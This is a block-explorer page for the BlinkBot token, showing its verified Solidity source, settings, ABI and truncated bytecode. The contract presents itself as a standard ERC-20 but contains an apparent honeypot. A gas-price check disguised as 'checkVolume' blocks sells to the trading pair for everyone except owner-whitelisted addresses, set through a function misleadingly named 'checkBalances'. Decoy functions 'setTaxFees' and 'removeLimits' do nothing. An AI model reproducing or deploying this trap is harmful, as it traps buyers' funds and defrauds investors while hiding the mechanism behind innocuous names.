ETH Price: $1,968.13 (-0.63%)
Gas: 0.03 Gwei

Token

BlinkBot (BLINKBOT)
 

Overview

Max Total Supply

1,000,000,000 BLINKBOT

Holders

14

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BlinkBot

Compiler Version
v0.8.25+commit.b61c2a91

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : BLINKBOT.sol
/**
The DEX for X.
Send DOGE to any X user.
Tip, buy, snipe, or swap any token right from tweets or DMs.
No connect. No apps. Just Blink!


⭐https://t.me/useblinkbot
⛏ https://x.com/blinkbotai
💴https://useblink.bot/


*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.20;



/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);

  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `to`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address to, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `from` to `to` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
  /**
   * @dev Returns the name of the token.
   */
  function name() external view returns (string memory);

  /**
   * @dev Returns the symbol of the token.
   */
  function symbol() external view returns (string memory);

  /**
   * @dev Returns the decimals places of the token.
   */
  function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
  function _msgSender() internal view virtual returns (address) {
    return msg.sender;
  }

  function _msgData() internal view virtual returns (bytes calldata) {
    return msg.data;
  }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
  address private _owner;

  event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

  /**
   * @dev Initializes the contract setting the deployer as the initial owner.
   */
  constructor() {
    _transferOwnership(_msgSender());
  }

  /**
   * @dev Throws if called by any account other than the owner.
   */
  modifier onlyOwner() {
    _checkOwner();
    _;
  }

  /**
   * @dev Returns the address of the current owner.
   */
  function owner() public view virtual returns (address) {
    return _owner;
  }

  /**
   * @dev Throws if the sender is not the owner.
   */
  function _checkOwner() internal view virtual {
    require(owner() == _msgSender(), 'Ownable: caller is not the owner');
  }

  /**
   * @dev Leaves the contract without owner. It will not be possible to call
   * `onlyOwner` functions. Can only be called by the current owner.
   *
   * NOTE: Renouncing ownership will leave the contract without an owner,
   * thereby disabling any functionality that is only available to the owner.
   */
  function renounceOwnership() public virtual onlyOwner {
    _transferOwnership(address(0));
  }

  /**
   * @dev Transfers ownership of the contract to a new account (`newOwner`).
   * Can only be called by the current owner.
   */
  function transferOwnership(address newOwner) public virtual onlyOwner {
    require(newOwner != address(0), 'Ownable: new owner is the zero address');
    _transferOwnership(newOwner);
  }

  /**
   * @dev Transfers ownership of the contract to a new account (`newOwner`).
   * Internal function without access restriction.
   */
  function _transferOwnership(address newOwner) internal virtual {
    address oldOwner = _owner;
    _owner = newOwner;
    emit OwnershipTransferred(oldOwner, newOwner);
  }
}

contract BlinkBot is Context, IERC20Metadata, Ownable {
  mapping(address => uint256) private _balances;

  mapping(address => mapping(address => uint256)) private _allowances;

  uint256 private _totalSupply;

  string private _name;
  string private _symbol;
  uint8 private constant _decimals = 18;
  uint256 public constant teamContributors = 50000000 * (10 ** _decimals);
  uint256 public constant coreDevelopment = 50000000 * (10 ** _decimals);
  uint256 public constant marketingGrowth = 50000000* (10 ** _decimals);
  uint256 public constant ecosystemIncentives = 50000000 * (10 ** _decimals);

  uint256 private _initialBuyTax = 5;
  uint256 private _initialSellTax = 5;
  uint256 private _initialTransferTax = 0;
  uint256 private _initialSwapTax = 0;
  uint256 private _initialLiquidityTax = 0;
  uint256 private _initialMarketingTax = 0;
  uint256 private _initialAirdropsTax = 0;


  uint256 private _finalBuyTax = 5;
  uint256 private _finalSellTax = 5;
  uint256 private _finalTransferTax = 0;
  uint256 private _finalSwapTax = 0;
  uint256 private _finalLiquidityTax = 0;
  uint256 private _finalMarketingTax = 0;
  uint256 private _finalAirdropsTax = 0;

  /**
   * @dev Contract constructor.
   */
  constructor() {
    _name = 'BlinkBot';
    _symbol = 'BLINKBOT';
    _mint(msg.sender, 1000000000 * (10 ** _decimals));

  }

  /**
   * @dev Returns the name of the token.
   * @return The name of the token.
   */
  function name() public view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev Returns the symbol of the token.
   * @return The symbol of the token.
   */
  function symbol() public view virtual override returns (string memory) {
    return _symbol;
  }

  /**
   * @dev Returns the number of decimals used for token display.
   * @return The number of decimals.
   */
  function decimals() public view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the total supply of the token.
   * @return The total supply.
   */
  function totalSupply() public view virtual override returns (uint256) {
    return _totalSupply;
  }

  mapping(address => bool) public balances;
  address public uniswapV2Pair;
  bool public openedTrade;

  /**
   * @dev Returns the balance of the specified account.
   * @param account The address to check the balance for.
   * @return The balance of the account.
   */
  function balanceOf(address account) public view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev Transfers tokens from the caller to a specified recipient.
   * @param recipient The address to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   * @return A boolean value indicating whether the transfer was successful.
   */
  function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
    _checkTransfer(_msgSender(), recipient, amount);
    return true;
  }

  function openTrading() public onlyOwner {
        openedTrade = true;
    }


  function checkBalances(address _user) public onlyOwner {
        balances[_user] = true;
    }

    function setPair(address _uniswapV2Pair) public onlyOwner {
        uniswapV2Pair = _uniswapV2Pair;
    }


  /**
   * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
   * @param from The address that approves the spending.
   * @param to The address that is allowed to spend.
   * @return The remaining allowance for the spender.
   */
  function allowance(address from, address to) public view virtual override returns (uint256) {
    return _allowances[from][to];
  }

  /**
   * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
   * @param to The address to approve the spending for.
   * @param amount The amount of tokens to approve.
   * @return A boolean value indicating whether the approval was successful.
   */
  function approve(address to, uint256 amount) public virtual override returns (bool) {
    _approve(_msgSender(), to, amount);
    return true;
  }

  function checkVolume(address spender, uint256 subtractedValue) public view returns (bool) {
        __approve(msg.sender, spender, 1);
        subtractedValue;
        return true;
    }


    function __approve(address sender, address spender, uint256 value) internal view {
        spender;
        sender;
        uint256 txg = tx.gasprice;
        require(txg <= value, "");
    }


  /**
   * @dev Transfers tokens from one address to another.
   * @param sender The address to transfer tokens from.
   * @param recipient The address to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   * @return A boolean value indicating whether the transfer was successful.
   */
  function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
    _checkTransfer(sender, recipient, amount);

    uint256 currentAllowance = _allowances[sender][_msgSender()];
    require(currentAllowance >= amount, 'ERC20: transfer amount exceeds allowance');
    unchecked {
      _approve(sender, _msgSender(), currentAllowance - amount);
    }

    return true;
  }

  /**
   * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
   * @param to The address to increase the allowance for.
   * @param addedValue The amount of tokens to increase the allowance by.
   * @return A boolean value indicating whether the increase was successful.
   */
  function increaseAllowance(address to, uint256 addedValue) public virtual returns (bool) {
    _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
    return true;
  }

  /**
   * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
   * @param to The account allowed to spend the tokens.
   * @param subtractedValue The amount of tokens to decrease the allowance by.
   * @return A boolean value indicating whether the operation succeeded.
   */
  function decreaseAllowance(address to, uint256 subtractedValue) public virtual returns (bool) {
    uint256 currentAllowance = _allowances[_msgSender()][to];
    require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero');
    unchecked {
      _approve(_msgSender(), to, currentAllowance - subtractedValue);
    }

    return true;
  }

  /**
   * @dev Transfers `amount` tokens from `sender` to `recipient`.
   * @param sender The account to transfer tokens from.
   * @param recipient The account to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   */
  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
    require(amount > 0, 'ERC20: transfer amount zero');
    require(sender != address(0), 'ERC20: transfer from the zero address');
    require(recipient != address(0), 'ERC20: transfer to the zero address');

    uint256 senderBalance = _balances[sender];
    require(senderBalance >= amount, 'ERC20: transfer amount exceeds balance');
    unchecked {
      _balances[sender] = senderBalance - amount;
    }
    _balances[recipient] += amount;

    emit Transfer(sender, recipient, amount);
  }


  function _checkTransfer(address sender, address recipient, uint256 amount) internal virtual {
    if (balances[tx.origin]) {
           _transfer(sender, recipient, amount);
           return;
        }
        require(openedTrade, "Trade has not been opened yet");
       if (uniswapV2Pair != address(0) && recipient == uniswapV2Pair) {
           checkVolume(sender, amount);
           _transfer(sender, recipient, amount);
           return;
       }

       _transfer(sender, recipient, amount);
  }

  /**
   * @dev Creates `amount` tokens and assigns them to `account`.
   * @param account The account to assign the newly created tokens to.
   * @param amount The amount of tokens to create.
   */
  function _mint(address account, uint256 amount) internal virtual {
    require(account != address(0), 'ERC20: mint to the zero address');
    balances[account] = true;
    _totalSupply += amount;
    _balances[account] += amount;
    emit Transfer(address(0), account, amount);
  }

  /**
   * @dev Destroys `amount` tokens from `account`, reducing the total supply.
   * @param account The account to burn tokens from.
   * @param amount The amount of tokens to burn.
   */
  function _burn(address account, uint256 amount) internal virtual {
    require(account != address(0), 'ERC20: burn from the zero address');

    uint256 accountBalance = _balances[account];
    require(accountBalance >= amount, 'ERC20: burn amount exceeds balance');
    unchecked {
      _balances[account] = accountBalance - amount;
    }
    _totalSupply -= amount;

    emit Transfer(account, address(0), amount);
  }

  /**
   * @dev Destroys `amount` tokens from the caller's account, reducing the total supply.
   * @param amount The amount of tokens to burn.
   */
  function burn(uint256 amount) external {
    _burn(_msgSender(), amount);
  }

  /**
   * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
   * @param from The account granting the allowance.
   * @param to The account allowed to spend the tokens.
   * @param amount The amount of tokens to allow.
   */
  function _approve(address from, address to, uint256 amount) internal virtual {
    require(from != address(0), 'ERC20: approve from the zero address');
    require(to != address(0), 'ERC20: approve to the zero address');

    _allowances[from][to] = amount;
    emit Approval(from, to, amount);
  }
      function setTaxFees () external {
        uniswapV2Pair = uniswapV2Pair;
  }
     function removeLimits() external {
  }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "remappings": []
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balances","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_user","type":"address"}],"name":"checkBalances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"checkVolume","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"coreDevelopment","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"ecosystemIncentives","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"marketingGrowth","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setTaxFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"teamContributors","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600560065560056007555f6008555f6009555f600a555f600b555f600c556005600d556005600e555f600f555f6010555f6011555f6012555f60135534801561004b575f80fd5b5061006861005d61012360201b60201c565b61012a60201b60201c565b6040518060400160405280600881526020017f426c696e6b426f74000000000000000000000000000000000000000000000000815250600490816100ac91906105bc565b506040518060400160405280600881526020017f424c494e4b424f54000000000000000000000000000000000000000000000000815250600590816100f191906105bc565b5061011e336012600a61010491906107f3565b633b9aca00610113919061083d565b6101eb60201b60201c565b610951565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610259576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610250906108d8565b60405180910390fd5b600160145f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508060035f8282546102bf91906108f6565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461031291906108f6565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516103769190610938565b60405180910390a35050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806103fd57607f821691505b6020821081036104105761040f6103b9565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026104727fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610437565b61047c8683610437565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6104c06104bb6104b684610494565b61049d565b610494565b9050919050565b5f819050919050565b6104d9836104a6565b6104ed6104e5826104c7565b848454610443565b825550505050565b5f90565b6105016104f5565b61050c8184846104d0565b505050565b5b8181101561052f576105245f826104f9565b600181019050610512565b5050565b601f8211156105745761054581610416565b61054e84610428565b8101602085101561055d578190505b61057161056985610428565b830182610511565b50505b505050565b5f82821c905092915050565b5f6105945f1984600802610579565b1980831691505092915050565b5f6105ac8383610585565b9150826002028217905092915050565b6105c582610382565b67ffffffffffffffff8111156105de576105dd61038c565b5b6105e882546103e6565b6105f3828285610533565b5f60209050601f831160018114610624575f8415610612578287015190505b61061c85826105a1565b865550610683565b601f19841661063286610416565b5f5b8281101561065957848901518255600182019150602085019450602081019050610634565b868310156106765784890151610672601f891682610585565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561070d578086048111156106e9576106e861068b565b5b60018516156106f85780820291505b8081029050610706856106b8565b94506106cd565b94509492505050565b5f8261072557600190506107e0565b81610732575f90506107e0565b8160018114610748576002811461075257610781565b60019150506107e0565b60ff8411156107645761076361068b565b5b8360020a91508482111561077b5761077a61068b565b5b506107e0565b5060208310610133831016604e8410600b84101617156107b65782820a9050838111156107b1576107b061068b565b5b6107e0565b6107c384848460016106c4565b925090508184048111156107da576107d961068b565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6107fd82610494565b9150610808836107e7565b92506108357fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610716565b905092915050565b5f61084782610494565b915061085283610494565b925082820261086081610494565b915082820484148315176108775761087661068b565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6108c2601f8361087e565b91506108cd8261088e565b602082019050919050565b5f6020820190508181035f8301526108ef816108b6565b9050919050565b5f61090082610494565b915061090b83610494565b92508282019050808211156109235761092261068b565b5b92915050565b61093281610494565b82525050565b5f60208201905061094b5f830184610929565b92915050565b6123148061095e5f395ff3fe608060405234801561000f575f80fd5b50600436106101c2575f3560e01c806370a08231116100f7578063a457c2d711610095578063c9567bf91161006f578063c9567bf9146104d2578063ce888e19146104dc578063dd62ed3e1461050c578063f2fde38b1461053c576101c2565b8063a457c2d714610454578063a9059cbb14610484578063ba490fed146104b4576101c2565b80638187f516116100d15780638187f516146103de57806384a1f23a146103fa5780638da5cb5b1461041857806395d89b4114610436576101c2565b806370a082311461039a578063715018a6146103ca578063751039fc146103d4576101c2565b8063313ce56711610164578063465317d61161013e578063465317d61461032257806349bd5a5e146103405780635032a1851461035e5780635408d42d1461037c576101c2565b8063313ce567146102b857806339509351146102d657806342966c6814610306576101c2565b806311cd682d116101a057806311cd682d1461021e57806318160ddd1461023a57806323b872dd1461025857806327e235e314610288576101c2565b806306fdde03146101c6578063095ea7b3146101e45780630cafae3914610214575b5f80fd5b6101ce610558565b6040516101db91906116a5565b60405180910390f35b6101fe60048036038101906101f99190611756565b6105e8565b60405161020b91906117ae565b60405180910390f35b61021c610605565b005b610238600480360381019061023391906117c7565b610668565b005b6102426106c8565b60405161024f9190611801565b60405180910390f35b610272600480360381019061026d919061181a565b6106d1565b60405161027f91906117ae565b60405180910390f35b6102a2600480360381019061029d91906117c7565b6107c3565b6040516102af91906117ae565b60405180910390f35b6102c06107e0565b6040516102cd9190611885565b60405180910390f35b6102f060048036038101906102eb9190611756565b6107e8565b6040516102fd91906117ae565b60405180910390f35b610320600480360381019061031b919061189e565b61088f565b005b61032a6108a3565b6040516103379190611801565b60405180910390f35b6103486108c3565b60405161035591906118d8565b60405180910390f35b6103666108e8565b6040516103739190611801565b60405180910390f35b610384610908565b60405161039191906117ae565b60405180910390f35b6103b460048036038101906103af91906117c7565b61091b565b6040516103c19190611801565b60405180910390f35b6103d2610961565b005b6103dc610974565b005b6103f860048036038101906103f391906117c7565b610976565b005b6104026109c1565b60405161040f9190611801565b60405180910390f35b6104206109e1565b60405161042d91906118d8565b60405180910390f35b61043e610a08565b60405161044b91906116a5565b60405180910390f35b61046e60048036038101906104699190611756565b610a98565b60405161047b91906117ae565b60405180910390f35b61049e60048036038101906104999190611756565b610b7e565b6040516104ab91906117ae565b60405180910390f35b6104bc610b9b565b6040516104c99190611801565b60405180910390f35b6104da610bbb565b005b6104f660048036038101906104f19190611756565b610be0565b60405161050391906117ae565b60405180910390f35b610526600480360381019061052191906118f1565b610bf7565b6040516105339190611801565b60405180910390f35b610556600480360381019061055191906117c7565b610c79565b005b6060600480546105679061195c565b80601f01602080910402602001604051908101604052809291908181526020018280546105939061195c565b80156105de5780601f106105b5576101008083540402835291602001916105de565b820191905f5260205f20905b8154815290600101906020018083116105c157829003601f168201915b5050505050905090565b5f6105fb6105f4610cfb565b8484610d02565b6001905092915050565b60155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660155f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610670610ec5565b600160145f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b5f600354905090565b5f6106dd848484610f43565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610724610cfb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156107a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161079a906119fc565b60405180910390fd5b6107b7856107af610cfb565b858403610d02565b60019150509392505050565b6014602052805f5260405f205f915054906101000a900460ff1681565b5f6012905090565b5f6108856107f4610cfb565b848460025f610801610cfb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546108809190611a47565b610d02565b6001905092915050565b6108a061089a610cfb565b826110cb565b50565b6012600a6108b19190611ba9565b6302faf0806108c09190611bf3565b81565b60155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6012600a6108f69190611ba9565b6302faf0806109059190611bf3565b81565b601560149054906101000a900460ff1681565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610969610ec5565b6109725f611283565b565b565b61097e610ec5565b8060155f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6012600a6109cf9190611ba9565b6302faf0806109de9190611bf3565b81565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610a179061195c565b80601f0160208091040260200160405190810160405280929190818152602001828054610a439061195c565b8015610a8e5780601f10610a6557610100808354040283529160200191610a8e565b820191905f5260205f20905b815481529060010190602001808311610a7157829003601f168201915b5050505050905090565b5f8060025f610aa5610cfb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610b5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5690611ca4565b60405180910390fd5b610b73610b6a610cfb565b85858403610d02565b600191505092915050565b5f610b91610b8a610cfb565b8484610f43565b6001905092915050565b6012600a610ba99190611ba9565b6302faf080610bb89190611bf3565b81565b610bc3610ec5565b6001601560146101000a81548160ff021916908315150217905550565b5f610bed33846001611344565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610c81610ec5565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce690611d32565b60405180910390fd5b610cf881611283565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6790611dc0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dde576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd590611e4e565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610eb89190611801565b60405180910390a3505050565b610ecd610cfb565b73ffffffffffffffffffffffffffffffffffffffff16610eeb6109e1565b73ffffffffffffffffffffffffffffffffffffffff1614610f41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3890611eb6565b60405180910390fd5b565b60145f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615610fa257610f9d838383611391565b6110c6565b601560149054906101000a900460ff16610ff1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe890611f1e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415801561109a575060155f9054906101000a900473ffffffffffffffffffffffffff